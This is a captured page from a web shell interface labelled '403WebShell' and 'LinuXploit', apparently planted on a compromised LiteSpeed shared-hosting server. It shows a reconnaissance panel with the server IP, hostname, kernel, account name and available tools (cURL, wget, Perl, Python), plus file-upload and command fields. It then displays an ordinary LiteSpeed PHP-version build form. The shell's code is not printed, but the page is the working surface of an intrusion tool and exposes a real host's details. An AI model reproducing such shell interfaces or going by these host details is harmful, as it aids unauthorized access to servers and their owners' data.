Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.222.179.239
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/local/lsws/admin/html.6.2.1/utility/build_php/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/lsws/admin/html.6.2.1/utility/build_php/buildStep1.php
<?php
if (!defined('LEGAL')) return;
echo '<h2 class="bottom_bar">' . TITLE . '</h2>';

if ( isset($check->pass_val['err']['bash'])) {
	echo '<div class="panel_error" align=left><span class="gui_error">'
		. $check->pass_val['err']['bash']
		. '</span></div>';
}


?>

<form name="buildphp" method="post">
<input type="hidden" name="step" value="1">

<table width="100%" class="xtbl" border="0" cellpadding="5" cellspacing="1">
	<tr class="xtbl_header">
		<td colspan="3" class="xtbl_title">
		 Step 1 : Select a PHP version
		</td>
	</tr>

<?php

$basevers = array_keys($PHP_VER);
rsort($basevers);

$buf = '';
foreach($basevers as $base_ver) {

	$versions = $PHP_VER[$base_ver];

	$buf .= '<tr class="xtbl_value"><td class="xtbl_label">PHP ' . $base_ver . '</td><td class="icon"></td><td>';

	$buf .= '<select name="php_version'. $base_ver . '">';
	foreach( $versions as $o ) {
		$buf .= "<option value=\"$o\">$o</option>";
	}
	$buf .= '</select>&nbsp;&nbsp;&nbsp;&nbsp;';

	$buf .=	'<input type="submit" name="build' . $base_ver . '" value="Next">'
			. "</td></tr>\n";

}

echo $buf;

?>
</table>
</form>
<p class="field_note"> * If you want to use a version not listed here, you can manually update the settings in /usr/local/lsws/admin/html/utility/build_php/buildconf.inc.php.</p>
<p class="field_note"> ** For more information regarding LSPHP, please visit <a href="https://docs.litespeedtech.com/lsws/extapp/php/" target="_blank" rel="noopener noreferrer">LiteSpeed wiki</a>.</p>

Youez - 2016 - github.com/yon3zu
LinuXploit